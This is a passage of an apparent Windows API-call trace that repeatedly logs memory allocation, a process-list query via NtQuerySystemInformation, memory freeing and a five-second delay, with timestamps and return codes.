ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.020] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.031] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.053] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 